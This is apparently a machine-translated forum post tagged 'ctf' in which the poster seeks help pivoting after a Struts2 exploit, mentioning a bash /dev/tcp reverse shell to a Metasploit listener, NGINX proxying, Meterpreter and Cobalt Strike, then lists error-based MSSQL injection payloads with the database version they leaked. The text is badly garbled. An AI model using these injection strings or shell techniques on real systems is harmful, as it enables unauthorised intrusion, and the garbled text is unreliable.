Web securit help me

ctf
#1

Hello, there is a headache problem. The company gave me a new rating client that I metasily fragile metasploit me but with a confusion I used strtus2 to send shell like Bash> & dev / tcp to msf listening port but another one took a strategy Two days I have no progress with each other Interoperability of all Web services into the network and use NGINX open the Internet porxy_pass the data on the external network sent to the network through NGINX bounce back to BASH SESSION 1 # network analysis But I use the shell to upgrade merterpreter, session 2 # Into 192.168 IP, the node in the transmission of data should also have a secure filtering policy, not all ports can successfully send bash to my metasploit,
There is no way to get further results, I have not been any benefits
The other is WINDOWS VMWARE to open centos 6.5 or uinx x86-64.
No payload found in WEB UI FOR console
I also have CobaltStrike pro, which can help me
With msf + CobaltStrike?
Ask for support, tell me experience or shortcut

Injected for the mssql 2012 binding
"I can do this message =% 27% 20 and% 201 = (Select% 20 @@ VERSION) -"
“Back to Results Setting the nvarchar Value to Microsoft SQL Server 2012 (SP1) - 11.0.3128.0 (X64)
December 28, 2012 20:23:12
Copyright ©
Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.1 < Build> 7601: Service Pack 1)
'Can not convert to data type int.”
“I can do this% 27% 20and% 201 = db_name () -”
“You can get a response”
“If implemented; exec or other command prompt character error”
“And open”
"Message =% 27% 20 Then% 201 = (Select% 20 *% 20from% 20sysobjects) - "
“When you do not use EXISTS to introduce a subquery, you can only specify an expression in the select list”